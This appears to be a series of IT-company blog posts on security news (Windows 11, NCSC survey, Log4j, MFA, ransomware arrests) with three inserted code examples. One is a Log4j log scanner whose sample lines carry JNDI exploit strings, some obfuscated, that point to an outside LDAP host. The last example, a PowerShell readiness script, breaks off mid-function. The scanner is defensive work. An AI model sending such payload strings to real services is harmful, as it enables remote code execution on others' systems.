Microsoft have announced a raft of new security features for Windows 11 – aimed squarely at the new trend of hybrid working.

With millions of users working remotely post-Covid, the enhancements largely focus on hardware security and identity protection, as end-user devices access ever more cloud-resources from a broader range of working environments.

 

Microsoft Pluton

‘Microsoft Pluton’ is the name of a new security processor integrated into CPUs on devices shipping with the new operating system – an App Control feature designed to prevent untrusted apps from running, block the theft of user credentials, and counter dangers from outdated drivers.

As we’ve noted before, Pluton (like Windows 11 itself) also relies upon Trusted Platform Module (TPM) technology to fire up a PC securely – but some TPM chips remain vulnerable to encryption keys being intercepted between components. Pluton devices are expected to close off that weakness, preventing this kind of hardware attack.

 

Smart App Control

As many predicted, Application Management begins taking centre-stage in 2022, as bigger organisations seek to prevent users introducing rogue software into their IT infrastructure (or worse, introducing it back into the company network themselves.)

Smart App Control blocks unsigned or suspicious apps at the OS level, and receives updates daily.

However – it’s worth noting this core feature only applies to newly shipped devices – so even those who adopted Windows 11 early would have to complete a full operating system reinstall to ensure Smart App Control is live.

 

Microsoft Defender SmartScreen

SmartScreen helps protect identity by alerting the user if they’ve begun interacting with a known malicious application, fake or hacked website – with the added advantage that the safeguard is pre-installed for all users.

Microsoft are keen to demonstrate SmartScreen’s record of success elsewhere – blocking nearly 26 billion brute force attacks on Microsoft Azure Active Directory, and nearly 36 billion phishing emails that were intercepted by Microsoft 365, last year alone.

 

Credential Guard

Another ‘by default’ upgrade – Credential Guard isolates really important system secrets in a way that is designed to stop ‘pass the hash’ style attacks where a hacker is able to use the encrypted version of a password to gain entry, and (Microsoft claim) can even prevent malicious applications that have somehow obtained Admin-user privileges on their device from accessing those secrets.

 

You can discover the full list of the security enhancements coming to Windows 11 here.


NCSC releases 2022 Cyber Security Breaches Survey

The National Cyber Security Centre (NCSC) has released its annual ‘Cyber Security Breaches Survey’.

The survey is used to inform government policy on digital security, educate British businesses, and ensure UK cyber space remains safe.

Data collected from over 2,400 businesses and 850 charities produced some startling statistics concerning the ever-looming threat of cyber-attacks infiltrating UK businesses’ digital footprint.

The report discovered that 39% of UK businesses detected an incoming cyber-attack during 2021. Phishing attacks made up a fifth of all threats identified – the most frequent type of malicious attack.

Organisations also revealed that ransomware is being recognised as a serious digital threat, with 56% of businesses stating they have introduced, or will be introducing, a company policy not to pay ransoms to cyber criminals.

Whilst 58% of small and medium businesses disclosed that they outsource their IT Support service, only 23% of surveyed businesses had a cybersecurity incident management strategy in place that is more advanced than basic endpoint antivirus.

The NCSC promotes a blend of regular cyber security learning and training processes within your business, to better inform the deployment of traditional cybersecurity software measures across all the organisation’s IT systems.

This multi-layered approach aims to counteract the report’s discovery that a lack of cyber technical expertise amongst UK businesses is to blame for threats going undetected.

Similarly, a company-wide policy of digital hygiene erodes the false assumption that managed cybersecurity strategies are a cost to the business rather than a strategic, protective investment.

31% of businesses admitted being attacked at least once a week, showing that any weak link in an organisation’s cyber defence can have grievous financial implications.

To mitigate this, we recommend organisations follow the NCSC’s guidance and adopt Cyber Essentials and Cyber Essentials Plus. The scheme requires businesses to meet or exceed an assured set of security requirements each year to protect against common forms of online crime, technology dangers and digital threats.

It is estimated that a Cyber Essentials certification can reduce your organisation’s risk of a cyberattack by 98.5% – contact Lineal to assist with your organisation’s application and to help you meet the requirements for a successful certification or re-certification today.


Hermetic Wiper Malware Hits Ukraine

Endpoint security specialist SentinelOne have isolated and demonstrated an installed instance of HermeticWiper malware currently destroying PCs across Ukraine.

First spotted on February 23rd, the 114KB ‘Hermetic Wiper’ malware gets its name from the (likely fictitious) ‘Hermetic Digital Ltd’ – a Cypriot company allegedly named on its digital certificate. The malware appears to have been circulated among a number of Ukrainian organisations, and abuses a partition management driver to begin corrupting a device’s physical drives.

Watch below as SentinelOne test-detonate an instance of Hermetic Wiper, first on an undefended PC, then with powerful endpoint protections in place:

Video Credit: SentinelOne.

Once activated, the malware initiates a device shutdown, making the system irretrievable and booting only as far as Windows’ ‘Your PC/Device needs to be repaired’ screen.

The timing and nature of the attack (crippling PCs in the short term, until they can be replaced) suggests an effort that has been coordinated with Russian military operations.

 

For cybersecurity advice and expertise, please contact Lineal today.


The Problem with QR Codes

QR codes have become an easy way for companies to promote themselves – now that everyone carries a barcode scanner in their pocket (their smartphone) why not take advantage of this to better connect with customers?

Well…. because it can also be a cybersecurity nightmare.

Cryptocurrency platform Coinbase recently made headlines by using their Super Bowl half-time advert to advertise themselves with a bouncing QR code that users could scan live from their sofas. As many pointed out, this is literally the equivalent of clicking a blind link in an email from an unknown sender – with users unlikely to have checked where the link will take them, or what information they’re handing over when they get there.

Worse still, even if a company’s own QR codes are harmless, it’s very easy to generate imitations online that are not – leveraging a larger company’s advertising as a way to scam users.

QR codes can all too easily be planted by third-parties as a way of tricking the unsuspecting – in particular, you need to be wary of the following scams:

 

Parking Meters
– A fake parking meter QR code, stuck on as a label, acts in a similar fashion to phishing emails and the card-skimming devices cybercriminals have famously used on ATMs to steal card details. By redirecting the user to a fake payment portal to pay for their parking, this catches those who might otherwise be in a rush. See also: fake parking penalty tickets.

 


SMS/Phone Codes
– QR codes are generally used from smartphones with calling and SMS sending abilities, so it’s possible to prompt the user to send a text message to a number. Handy for business, certainly, but risky if the user doesn’t realise they’re calling or texting a premium number.

 


Social Media Share
– Scan here to automatically tweet a link from @Lineal! Unfortunately that link is easily manipulated, potentially making the scanner part of further phishing attempts on their own Twitter followers.

 

Connecting to Wi-Fi
– In public spaces, many businesses will prompt users to join their free Wi-Fi via QR code. Clever and convenient, but obviously easy to use as a mechanism for a man-in-the-middle attack by those whose fake Wi-Fi network is simply a trap set for the unsuspecting user who’s just trying to access their email in a coffee shop, airport or hotel.

 

Guidance:

Think before you click – does the QR code match the rest of their branding? Where does the link preview point to? Is there anybody/anywhere you can double-check?

Use a Password Manager – although you might not spot a fake website URL, a password manager that normally autofills a password only on the specific site it was saved for will recognise the fake immediately.

Since a mobile device usually doesn’t sit behind a firewall that’s likely to detect threats as you browse the web, companies issuing work mobiles & tablets also need to extend endpoint security software to those devices – the same way you would for a work laptop used on the move.

Most importantly, users need to be regularly educated on the importance of recognising phishing scams with organised training – to build personal resilience that extends to whatever device they happen to be using.

 

For Cybersecurity expertise and support, contact Lineal today.


2022: New Rules for Cyber Essentials

This year GCHQ’s National Cyber Security Centre have introduced stricter new rules for businesses and organisations hoping to achieve UK Cyber Essentials (CE) and Cyber Essentials Plus (CE+) Certification.

In addition to promoting the scheme’s key priorities, the new terms for successful assessment are widely believed to be partially a response to recent events – including more widespread remote and home-working via cloud-based web services during Covid-19, and a series of devastating ransomware attacks that disrupted major infrastructure in the US.

Need a taster of what’s to come? Here are our key take-aways:

 

Cloud Services under the spotlight

In previous years organisations could exclude many cloud-based platforms from the scope of their assessment – but with the wholesale move to the cloud only accelerating under working from home, and web-services containing ever more data, cloud-based systems such as Microsoft 365 and Google Workspace move squarely into the frame.

 

Multiplying multi-factor

Most critically this year, two-factor authentication will become compulsory for all administrator accounts registered to cloud-based services – as the NCSC tries to stop hackers obtaining credentials and then remote accessing their way to cyber-devastation. Expect user accounts to follow in 2023 – an exemption may be granted under certain circumstances, but it’s clear the days of the old ‘password-only’ login are numbered.

2022 also places new restrictions on passwords: organisations are encouraged to have password managers enforcing random passwords of 8 characters or more, or a 12-character pattern, at a minimum. Mobile devices and similar should have a minimum six-digit PIN or biometric security – with a recommended lock-out after ten failed password attempts.

 

Sub-networks under scrutiny

Sub-networks may now only be excluded if they have no connection to the main network or no internet access – meaning many organisations will now have to detail their satellite and subordinate operations more fully.

Patching discipline is said to be the most common reason for failing a Cyber Essentials assessment – the 14-day patch window remains, but automated updates should now be enabled where available. Thin client devices are to be included from next year, and unsupported software should be air-gapped on sub-networks that don’t have internet access.

 

A question of hats

All super-users are now meant to have distinct user and administrator accounts, with stronger security on the latter. This distinction extends to cloud-services, meaning administrators will have to swap between their day-to-day functions completed on user accounts, and their admin roles where they have elevated privileges.

In the wake of the Colonial Pipeline ransomware attack and others, it’s clear rules for admin accounts will only become more stringent.

 

Greater auditing

Cyber Essentials Plus Certification will increasingly require more in-depth auditing by independent inspectors – including sending malicious test-emails, validating software versions, testing file access, and confirmation of the all-important admin/MFA rules described above.

 

Lineal are a Cyber Essentials Plus certified organisation, and can help your team achieve certification. Contact our team today.


Announcing: SentinelOne

For 2022 we’re announcing a series of changes to the way Lineal helps keep your IT safe and secure – including some new technologies that will allow us to better care for our customers’ cybersecurity.

One of these is the introduction of SentinelOne as an alternative to traditional antivirus options. We’ve formed this partnership to offer a more extensive set of tools to customers, and further modernise the way we keep your staff, systems and data safe.

You can learn more about SentinelOne, and why we’ve taken this step, below:

 

What is SentinelOne?

SentinelOne is next-generation Endpoint Detection & Response (EDR) software that we’ll be recommending in future to protect PCs, Macs and more from cybersecurity threats, in place of more traditional antivirus options.

 

Why are Lineal making this change?

We’re responding to changing times – in recent years we’ve seen the threats to small businesses shift away from general malware towards more dangerous ransomware that encrypts data and seeks to extort payment from victims.

 

Why have you re-focused on Ransomware?

The scale of the threat. While malware might endanger data, hit device performance or introduce other serious technical problems, ransomware can be totally devastating – bringing even major industries to a standstill.

The UK National Cyber Security Centre recently argued that “Ransomware represents the key cybersecurity threat facing Britain…” – following a series of high-profile and crushing ransomware breaches in the US, across industry, and against the NHS.

For a small business, a ransomware infection is potentially terminal, and as the methods used by cybercriminals change, our recommended cybersecurity precautions need to adjust to reflect this.

 

What’s wrong with traditional antivirus?

While traditional antivirus software is a good defence, it typically works by comparing against a regularly updated list of known threats. This technique has its limits – particularly when it comes to never-before-seen ‘Zero Day’ threats.

With the spread of ‘ransomware kits’ on the dark web, it’s becoming easier and easier for cybercriminals to introduce brand new variants and strains, on an hourly basis. This necessitates a different kind of counter-measure: intelligent EDR software that understands how a threat to an endpoint ‘acts’ and can remediate more effectively.

 

 

OK, but why SentinelOne rather than [Product X?]

In addition to performing exceptionally well in independent testing, we’ve been impressed with SentinelOne’s cloud-based management and ‘storyline’ investigation tools, and their Ransomware Warranty pledge of $1,000 per computer (Up to $1m) for each machine with valid protection.

Even more impressively, the Singularity engine utilises some highly advanced fingerprinting technology to support cutting-edge rollback abilities – a powerful aid to incident response.

The company consistently ranks as a Leader in Gartner analysis, is the only vendor on record to achieve a 100% score in MITRE Engenuity testing, and won both Gartner’s 2021 ‘Customer Choice’ highest-ranked product and CRN’s 2021 Product of the Year award for endpoint security.

 

What does this all mean for me?

In future cybersecurity discussions, one of the Lineal team may speak with you about EDR, and may quote SentinelOne as an alternative option to renewing your existing antivirus.

If you would like to discuss this with us, please contact [email protected] or simply speak to one of our team.

 

PC & Mac? And Servers too?

Yes!

 

Will I still be able to purchase other Antivirus products via Lineal?

Yes!


Have I Been Pwned publicises 225 million new breached passwords

The UK’s National Crime Agency (NCA) has urged the public to check the security of their email addresses and passwords after it uploaded 225 million unique passwords to the hack-checking service Have I Been Pwned (HIBP).

With this addition of 225 million passwords obtained from cyber criminals, the NCA are urgently encouraging people to search for their own passwords on the website to check if their details are in the hands of hackers.

The 225 million passwords that were found in a compromised cloud storage facility were an accumulation of datasets both known and unknown.

HIBP is a free online service allowing users to search the now updated, 853 million-strong Pwned Passwords database to see if their email or password has been compromised, and in which specific historic or current data breaches their data was listed.
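As an added example (not code from the original post or from HIBP itself), the following Python shows how a service can check a password against Pwned Passwords using its k-anonymity range API: only the first five hex characters of the password’s SHA-1 hash are sent, and the full hash never leaves the machine. The live query uses the documented api.pwnedpasswords.com range endpoint; the response body used in the offline demo, including its counts, is constructed.

```python
import hashlib
from urllib.request import Request, urlopen

RANGE_API = "https://api.pwnedpasswords.com/range/"  # documented HIBP endpoint


def sha1_upper_hex(password: str) -> str:
    """Pwned Passwords is keyed on the upper-case hex SHA-1 of the password."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()


def range_query_parts(password: str):
    """Split the hash into the 5-char prefix that is sent and the 35-char suffix kept local."""
    digest = sha1_upper_hex(password)
    return digest[:5], digest[5:]


def parse_range_body(body: str) -> dict:
    """Parse 'SUFFIX:COUNT' lines. Padding entries (count 0) parse harmlessly."""
    counts = {}
    for line in body.splitlines():
        line = line.strip()
        if not line:
            continue
        suffix, _, count = line.partition(":")
        counts[suffix.upper()] = int(count)
    return counts


def fetch_range(prefix: str, timeout: int = 10) -> str:
    """Live query for one prefix. 'Add-Padding' asks HIBP to pad the response so
    its size does not reveal which prefix was asked for. Not used by the offline demo."""
    req = Request(RANGE_API + prefix,
                  headers={"Add-Padding": "true", "User-Agent": "example-password-check"})
    with urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8")


def check_password(password: str, fetch=fetch_range) -> int:
    """Return how many times the password appears in known breaches (0 = not found).
    `fetch` is injectable so the check can run against a canned body offline."""
    prefix, suffix = range_query_parts(password)
    return parse_range_body(fetch(prefix)).get(suffix, 0)


# Constructed stand-in for the body HIBP would return for the prefix of "password".
# The first suffix is real (derived from the hash); the counts and other suffixes are made up.
SAMPLE_RANGE_BODY = "\n".join([
    "0018A45C4D1DEF81644B54AB7F969B88D65:2",
    "00D4F6E8FA6EECAD2A3AA415EEC418D38EC:0",          # padding entry
    range_query_parts("password")[1] + ":3730471",     # constructed count
])


def offline_fetch(prefix: str) -> str:
    """Stand-in for fetch_range that only knows the constructed prefix."""
    return SAMPLE_RANGE_BODY if prefix == range_query_parts("password")[0] else ""


if __name__ == "__main__":
    for candidate in ["password", "a long unique passphrase no one has used"]:
        print(candidate, "->", check_password(candidate, offline_fetch))
```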

Troy Hunt, owner of Have I Been Pwned, received a statement from the NCA reporting:

“During recent NCA operational activity, the NCCU’s Mitigation@Scale team were able to identify a huge amount of potentially compromised credentials (emails and associated passwords) in a compromised cloud storage facility”

Hunt further revealed that Have I Been Pwned’s new data ingestion pipeline is now live. The service allows law enforcement agencies across the globe to upload compromised email addresses and passwords directly to the Pwned database and has already seen collaboration with the FBI. Hunt goes on to explain:

“During the course of their investigations, they come across a lot of compromised passwords, and if they were able to continuously feed those into HIBP, all the other services out there using Pwned passwords would be able to better protect their customers from account takeover attacks”

Compromised passwords present significant security vulnerabilities for UK businesses as identified in a National Cyber Security Centre study which revealed that UK businesses experienced 777 cyber incidents in 2021, up from 723 in 2020.

Protection of network login credentials and identification of breached passwords is essential to keep companies’ data secure and to avoid ransomware attacks – as exemplified by July’s devastating ransomware attack on Kaseya, and the 500 million affected by data breaches at Facebook and LinkedIn in April.

Being Cyber Essentials Plus Certified, Lineal has identified the growing need for a managed cybersecurity solution for businesses of all sizes. Our cybersecurity package aims to safeguard your business’ data against a host of cyber threats across multiple platforms including password encryption keys.

For more information on how we can help secure your business, visit our Cybersecurity page.


Log4j Exploit Sets Internet Ablaze

A massive cybersecurity vulnerability discovered in an Apache logging tool has caused chaos across the internet, as organisations rush to patch millions of web-based services around the world.

The Log4j weakness is a bug in Apache’s open-source Log4j v2 logging library for Java, allowing an outside user to insert their own code that Log4j will interpret as ‘real’ instructions, to devastating effect.

Log4j is highly common across huge numbers of web-based services, servers with web based front-ends, and countless devices that support some kind of web-based maintenance – such as routers, network switches and many more.

A horrifying compilation of screenshots gathered on GitHub shows how (at time of writing) hackers can already exploit the bug everywhere from the search fields of LinkedIn, Amazon and Baidu, to the login pages of Apple and Cloudflare, across Webex meetings and even the chat boxes of online games such as Minecraft.

In each case hackers can use the vulnerability to make the device’s network access either forward confidential information to another URL or retrieve a payload from another website. According to reports by Ars Technica, the trick has already been used in the wild, with researchers seeing new botnets, crypto-mining malware and more installed by hackers.

CVE-2021-44228 is graded ‘Critical’ by Apache, and SysAdmins are advised to patch services urgently.
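As an added defensive example (not from the original post or from Apache), this Python scans web-server access-log lines for the Log4j lookup syntax that CVE-2021-44228 abuses, URL-decoding first and collapsing the nested-lookup variants seen in scanning traffic so an obfuscated ‘jndi:’ string is still flagged for the responder. The log lines, request paths and IP addresses are constructed samples.

```python
import re
from urllib.parse import unquote

# Innermost Log4j lookup: "${...}" whose body contains no further braces.
LOOKUP = re.compile(r"\$\{([^{}]*)\}")


def _resolve(expr: str):
    """Resolve one innermost lookup the way Log4j would, for the forms commonly
    seen in probes. Returns None when it cannot be resolved locally."""
    low = expr.lower()
    if low.startswith("lower:"):
        return expr[6:].lower()
    if low.startswith("upper:"):
        return expr[6:].upper()
    if ":-" in expr:                      # ${name:-default} falls back to the default
        return expr.split(":-", 1)[1]
    return None


def normalise(text: str, max_rounds: int = 20) -> str:
    """Repeatedly collapse resolvable inner lookups so that an obfuscated string
    converges on its plain form before matching."""
    for _ in range(max_rounds):
        changed = False

        def repl(match):
            nonlocal changed
            resolved = _resolve(match.group(1))
            if resolved is None:
                return match.group(0)
            changed = True
            return resolved

        text = LOOKUP.sub(repl, text)
        if not changed:
            break
    return text


def classify(line: str):
    """Return (severity, normalised_line) for a log line, or None if it is clean.
    URL-decoding first catches %24%7B-encoded lookups in request paths."""
    decoded = unquote(line)
    if "${" not in decoded:
        return None
    norm = normalise(decoded)
    if re.search(r"\$\{\s*jndi:", norm, re.IGNORECASE):
        return "high", norm      # a JNDI lookup reached from user input: exploitation attempt
    return "review", norm        # lookup syntax in a request field is unusual: inspect manually


def scan_log(lines):
    """Scan an iterable of access-log lines and return the findings in order."""
    findings = []
    for number, line in enumerate(lines, 1):
        verdict = classify(line)
        if verdict:
            findings.append({"line": number, "severity": verdict[0], "normalised": verdict[1]})
    return findings


# Constructed sample access-log lines (RFC 5737 documentation addresses, made-up requests).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2021:12:00:00 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.8 - - [10/Dec/2021:12:00:01 +0000] "GET /search?q=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.5%3A1389%2Fa%7D HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:${::-l}dap://198.51.100.5:1389/x}"',
    '203.0.113.10 - - [10/Dec/2021:12:00:03 +0000] "GET /price?amount=$100 HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
    '203.0.113.11 - - [10/Dec/2021:12:00:04 +0000] "GET /report?t=${date:yyyy} HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["line"], finding["severity"], finding["normalised"])
```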


An Important Change: MFA

Lineal’s IT Support Teams are rolling out an important security change to the way we secure your Microsoft 365 accounts – enabling Multi-Factor Authentication (MFA) for all users.

We’re taking this step in response to a marked increase in account-theft attempts that we’ve seen in recent months; where previously MFA was an optional extra for added security, we’re now strongly recommending this be enabled across the board.

We feel this is an appropriate measure – in addition to having become a standard security measure across many web-based services in recent years, the advantages of MFA are increasingly recognised as vastly outweighing the downsides.

 

Who is affected by this change?

Every person with a Microsoft 365, Exchange Online or Azure user account licensed with Lineal.

 

What are the advantages?

An extra ‘factor’ at login drastically improves the security of your user account – making it difficult for any attacker who manages to obtain your username & password to log into Microsoft 365 using your identity.

If your credentials are stolen from another website, or tricked from you via a phishing email, this is no longer enough information for a hacker to be able to access your account from another location. Multi-factor authentication is estimated to stop over 99% of this kind of automated (harvested-credential stuffing) attack.

 

Why are Lineal enforcing this?

We’ve encountered a noticeable increase in account-takeover attempts in recent months, with individuals’ work emails then being used for the onward spread of supply-chain attacks and phishing emails to others.

Multi-factor authentication is already standard practice across online-banking in the UK, and we believe it should be standardised for all identity-based online services.

 

How does it work?

In addition to your username and password, each user registers a third factor – typically either a mobile phone number (for SMS), smartphone authenticator app, USB security key or password manager – any of which generates a temporary code for login. This extra ‘factor’ verifies your identity – making it hard for a third party to log into your accounts, since they won’t have access to the temporary passcode.

There’s a short video introduction to MFA here, and you can learn more via our Client Portal guide here.

 

Which MFA method should I be using?

For preference, we recommend free authenticator-app-based MFA via Microsoft Authenticator, Google Authenticator or similar apps for iOS/Android. These are generally considered a more secure method than single-use SMS (text-message) codes, which have their weaknesses, with Microsoft and others announcing this method will be phased out.

However, even SMS-based MFA will be more secure than a standalone password, so we’ll still implement this where necessary.

 

Does my organisation need to budget for this?

No – although paid options are available if you need your MFA backed by Conditional Access or other security settings.

 

What’s the timetable for this change?

We’re aiming to have this change fully deployed by 2022.

 

What do I need to do?

Nothing for now – a member of your Lineal IT Support team will be in touch to discuss implementing the change.

 

What if I experience issues getting started with MFA?

Please contact our IT Support Teams via [email protected], 01271375999 or via our Client Portal, and one of our team will be happy to assist.


Apple’s Self Service Repair Program announced

Apple has unveiled ‘Self Service Repair’ (SSP) giving hope to individual consumers to complete their own repairs with genuine Apple parts and tools.

With the introduction of ‘Self Service Repair’, individual customers will now join 2,800 Independent Repair Providers (IRPs) and 5,000 Apple Authorized Service Providers (AASPs) in receiving authorisation to fix their Apple devices using genuine parts, tools and documentation guides.

The move comes after growing pressure on tech providers to support a public ‘Right to Repair’ in the interests of environmental and consumer protection.

Over 200 Apple OEM parts and tools, along with manual documentation, will be made available initially for the iPhone battery, display and camera, with additional repair opportunities being added during 2022. SSP will see first light in the United States, with global expansion planned throughout 2022, facilitated via an online store for technical consumers with the knowledge and experience to fix their own damaged devices.

Prices for these genuine parts are yet to be officially released, but the online store will be managed by an unnamed third party provider with repair manuals being made available through the Apple Support website.

This announcement positions Apple as the central hub for consumers who want access to genuine parts and how-to manuals for out-of-warranty, damaged devices. However, the scheme is only aimed at new and future models of Apple products, and will not help customers who own older generations of iPhone or Mac devices. SSP is initially being rolled out across the iPhone 12 and 13 line-ups, with future plans to include Mac computers with M1 chips.

Responsibility for fixing their own Apple devices has shifted from IRPs onto the consumer, permitting wide public access to the tightly guarded Apple ecosystem. Examples of this devolution of repairs to the masses include new software support for ‘True Tone’, allowing replacement display parts to be used on iPhone devices, and a scheme under which customers who return their broken Apple ‘core’ device parts receive credit towards their original purchase order.

The self-service repair program is just one pillar of a multi-pronged approach by Apple for increasing the longevity of their endpoints’ lifecycles including the introduction of a ceramic chassis shield and the replacement of plastic with steel on the iPhone 12 and 13 alongside crack resistant crystal for the Apple Watch 7’s display.

However, Apple and associated commentators warn of the dangers of consumer self-service repair: DIY by Apple device owners can lead to further damage to the device through misrepair, and tampering with the lithium-ion battery can cause serious bodily harm.

For the majority of Apple device owners, visiting a professional repair provider such as Lineal, where our experienced technicians use genuine Apple parts, is the most reliable and safest way to ensure a successful repair.

For Apple device expertise and IT support, please contact our team today.


REvil Ransomware Gang Arrested

Law enforcement agencies have announced the arrest of seven individuals linked to REvil ransomware which caused a series of high profile ransomware incidents earlier this year.

Europol and the US Department of Justice recently announced the success of ‘Operation GoldDust’ which included a joint-effort from 17 countries – with arrests spanning Romania, Poland, South Korea and Kuwait.

The group are accused of 7,000 individual ransomware attacks, and of links to attacks which breached organisations using Kaseya remote-management software back in July – a supply chain attack described by security specialists SentinelOne as a ‘well orchestrated’ and ‘mass-scale’ ransomware campaign.

REvil was also used in the devastating attack on the Colonial Pipeline which caused fuel shortages across the US East Coast, and at the world’s largest meat supplier JBS Foods earlier in 2021. Authorities are believed to have recovered around $6.1m in ransom payments so far.

Europol thanked all the countries involved, along with Eurojust and Interpol, for a concerted effort, and also praised the contribution of a number of private cybersecurity firms who assisted Operation GoldDust with technical support.

A previous investigation by Romanian police suggested the REvil group were an offshoot of those responsible for GandCrab ransomware released in 2018, and resulted in the release of three universal decryption tools by UK and US authorities which are believed to have prevented a further €60m of ransom payments from being extorted.

After originally claiming to be disbanding in September, it was revealed REvil’s infrastructure was itself hacked by a joint team from the FBI, US Cyber Command and the Secret Service – and forced offline. Key members of the group’s leadership, believed to be Russian, were thought to be on the run.

The issue of Russian reluctance to tackle cyber-crime syndicates also spilled over into warnings of US retaliation during in-person talks between US President Joe Biden and Russian President Vladimir Putin in June.

 


Apple U-Turns on MacBook Pro

Apple has released a staggeringly powerful new MacBook Pro model for 2021, bundling some important changes of direction.

Firstly, screen size: Apple will offer both 14-inch and 16-inch versions of the latest Pro, having presumably seen the light from both PC rivals (looking at you Dell), and its own Apple devotee fanbase, respectively – who for years have hoped for the larger 17” format to be re-released.

In a big U-turn, Apple has also re-introduced HDMI, SDXC and other ports, after famously removing all but USB-C from the MacBook’s chassis in 2016. That future didn’t quite work out – as Apple now acknowledges: the user-base of the Pro in particular have generally been power-users that need more options, not just more dongles.

Unlike its smaller cousins, the MacBook Pro 2021 isn’t burdened by quite the same portability obsession – favouring high performance for processor-intensive computing, photo, audio and video-editing – of the kind that makes Macs popular among creatives and software developers. The latest edition of the ‘power user’s’ MacBook incorporates the all-new M1 Pro and M1 Max chips, which boast some eye-watering performance statistics.

MagSafe also makes a welcome return, ensuring that a snagged power cable won’t pull your laptop off the table into oblivion. 2016’s Touch Bar, never quite beloved of the user-base, has been scrapped to enlarge the keyboard – returning the overall design in the direction that originally made the Pro so successful.

Prices begin at £1,899 inc VAT for the 14-inch model, and £2,399 inc VAT for the 16-inch. For those with no maximum budget, optional extras are available up to a blistering 64GB of memory and an 8TB (!) SSD, for those who need a laptop with all the stored-up potential of a nuclear reactor.


Kickstart Success at Lineal

Lineal’s Tom Williamson Cary has become one of North Devon’s first successful ‘Kickstart scheme graduates’.

During his six month Kickstart placement at Lineal, Tom has worked on numerous new business opportunities, helped promote Lineal, and even mentored younger students as part of Lineal’s work with the PETROC ‘Techknowledgy Transfer’ Project – funded by the Department for Business, Energy and Industrial Strategy working with Innovate UK under the Business Basics programme.

Having completed the Kickstart programme, Tom will now join Lineal’s Marketing Team as a full-time staff member, to work on business development, and is believed to be among only a handful of such ‘Kickstart graduates’ in North Devon.

Lineal’s Managing Director Mike Matthews explained: “Tom is one of the first wave of Kickstart placements – one of around sixteen thousand young people across the UK – who’ve already benefitted from this scheme. He shows real promise and enthusiasm, and we’re delighted he’ll now be joining our team longer-term.”


Tom said: “I’ve learnt a lot over six months, and it’s been great to be welcomed to the team and get started on some exciting projects.”

The Kickstart scheme is a £2 billion Government programme dedicated to short-term work placements for those aged 16-24 who are eligible to claim Universal Credit – and aims to help bridge the gap between education and work, when many young people are at risk of longer-term unemployment.

Businesses can learn more about the Kickstart Scheme here.

Welcome Tom!


Lineal’s Lewis Graduates Degree Apprenticeship

Lineal’s Lewis Marrow has graduated from the University of Plymouth to become North Devon’s first cybersecurity ‘Degree Apprentice’.

Starting at Lineal in 2017 to pursue an apprenticeship in cybersecurity via PETROC, Lewis’s skills have gone from strength to strength, seeing him achieve a 2:1 BSc (Hons) from the University of Plymouth (Digital Technology Solutions: Cyber Security Analyst).

‘Degree’ or ‘Higher’ Apprenticeships are an advanced category of apprenticeship organised by the National Apprenticeship Service that combine undergraduate-level academic work with specialist training in the workplace.

Apprentices are expected to ‘earn-and-learn’ in tandem, gaining both knowledge and industry skills that are greatly-valued by employers. Many, like Lewis, are quickly snapped up by their business sponsors full-time once their apprenticeship is completed.

Lewis said: “A Degree Apprenticeship has been a fantastic experience, allowing me to gain the knowledge and training I require to become an IT professional. The team at Lineal have been very supportive along the journey and I would recommend it to anyone.”

While working at Lineal, Lewis won a Petroc Outstanding Achievement Award, has appeared in a Department for Culture, Media and Sport ‘Real Ideas’ film project promoting STEM education in schools, and his cybersecurity work has improved the resilience of numerous organisations – including helping Lineal itself achieve Cyber Essentials Plus Certification.

Lewis also recently completed the Great North Run in a blisteringly quick time of just under 1 hour and 27 minutes!

Congratulations Lewis!


How to prepare for Windows 11

Windows 11 is due to be released officially on 5th October 2021 – the first major version upgrade since Windows 10 was released in 2015.

As with Windows 10, PC users will be able to begin downloading the new version from this date, and new PCs will begin shipping with Windows 11 pre-installed.

If the thought of your PC changing fills you with dread – never fear! Here’s how you prepare:

 

See a preview

The first thing most users will notice is the visual improvement – Windows 11 features a ‘new design’ which forms the backbone of the update in an effort to make PC screens feel more user-friendly, calming and interact better with natural light.

 

Check Minimum Specifications

The following list summarises the published minimum specifications required to install and operate the new upcoming version:

– Processor: 1 gigahertz (GHz) or faster with 2 or more cores on a compatible 64-bit processor or System on a Chip (SoC)
– RAM: 4 gigabytes (GB)
– Storage: 64 GB or larger storage device
– System firmware: UEFI, Secure Boot capable
– TPM: Trusted Platform Module (TPM) version 2.0
– Graphics card: Compatible with DirectX 12 or later with WDDM 2.0 driver
– Display: High definition (720p) display that is greater than 9” diagonally, 8 bits per colour channel
– Internet connection and Microsoft accounts: Windows 11 Home edition requires internet connectivity and a Microsoft account to complete device setup on first use.

Switching a device out of Windows 11 Home in S mode also requires internet connectivity. For all Windows 11 editions, internet access is required to perform updates and to download and take advantage of some features. A Microsoft account is required for some features.

Microsoft’s full specifications for Windows 11 can be found here.
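As an added example (not part of the original post, and not Microsoft’s own PC Health Check tool), the following PowerShell script tests a Windows 10 PC against the published minimums listed above using standard Windows cmdlets; the graphics (DirectX 12 / WDDM 2.0) and physical display-size requirements are left to dxdiag.

```powershell
# Added example: read-only Windows 11 readiness check. Run in an elevated
# PowerShell 5.1 session on the Windows 10 PC you intend to upgrade.
# Nothing on the machine is changed.

function Test-Windows11Readiness {
    $checks = [ordered]@{}

    # Processor: 1 GHz or faster, 2 or more cores, 64-bit
    $cpu = Get-CimInstance -ClassName Win32_Processor | Select-Object -First 1
    $checks['CPU: >= 1 GHz, >= 2 cores, 64-bit'] =
        ($cpu.MaxClockSpeed -ge 1000) -and
        ($cpu.NumberOfCores -ge 2) -and
        ($cpu.AddressWidth -eq 64)

    # RAM: 4 GB. TotalPhysicalMemory excludes memory reserved by firmware,
    # so a small margin is allowed rather than demanding exactly 4 GB.
    $ramBytes = (Get-CimInstance -ClassName Win32_ComputerSystem).TotalPhysicalMemory
    $checks['RAM: >= 4 GB'] = $ramBytes -ge (3.9 * 1GB)

    # Storage: the disk Windows boots from must be 64 GB or larger
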